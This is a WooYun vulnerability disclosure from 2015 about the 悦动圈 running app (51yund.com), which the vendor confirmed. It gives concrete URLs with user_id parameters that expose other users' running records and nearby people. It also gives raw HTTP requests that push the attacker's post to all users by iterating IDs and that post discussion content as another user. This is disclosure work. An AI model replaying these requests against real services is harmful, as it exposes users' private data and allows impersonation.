当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114157

漏洞标题:悦动圈跑步信息泄露+成为公众焦点+伪造他人发言等诸多安全漏洞

相关厂商:51yund.com

漏洞作者: 酱油甲

提交时间:2015-05-14 19:54

修复时间:2015-06-29 09:36

公开时间:2015-06-29 09:36

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-14: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

悦动圈跑步信息泄露+伪造他人发言

详细说明:

信息泄露:
看别人跑步与红包:
1. grouprun.51yund.com/grouprun/person_challenge_record?user_id=1309706
2. grouprun.51yund.com/claimed?group_run_id=7382&user_id=1309706&member_id=1309706&is_share=&v=2.5.0
--------------------------
查看其他人周围的人:
1.feed.51yund.com/feed/feedFlowV2?feed_type=nearby&user_id=1527479&v=2.5.0
---------------------------
成为大众焦点:

POST /feed/addFlow HTTP/1.1
Host: feed.51yund.com
Proxy-Connection: keep-alive
Referer: http://feed.51yund.com/feed/feedFlowV2?feed_type=friends&user_id=1244698&v=2.5.0
Content-Length: 36
Origin: http://feed.51yund.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,application/json
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; M040 Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: Hm_lvt_16715600744c3f42d68d289968955a26=1431601664; Hm_lpvt_16715600744c3f42d68d289968955a26=1431602221
user_id=遍历ID&flow_user_id=你的ID


---------------------------
伪造他人发言:

GET /editDiscussion?source_type=2&user_id=1527479&v=2.5.0 HTTP/1.1
Host: circle.51yund.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Requested-With: com.yuedong.sport
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; M040 Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: Hm_lvt_921ea069a48a3bb4aa2ad6be708d9510=1431601663; Hm_lpvt_921ea069a48a3bb4aa2ad6be708d9510=1431601663;

漏洞证明:

看别人跑步与红包:

1.jpg


2.jpg


-----------------------------
成为大众焦点:

3.jpg


26.jpg


-----------
伪造他人发言:

21.jpg


22.jpg


24.jpg


25.jpg

修复方案:

版权声明:转载请注明来源 酱油甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-15 09:35

厂商回复:

感谢提交, 问题已知。 正在安排修复。 感谢

最新状态:

暂无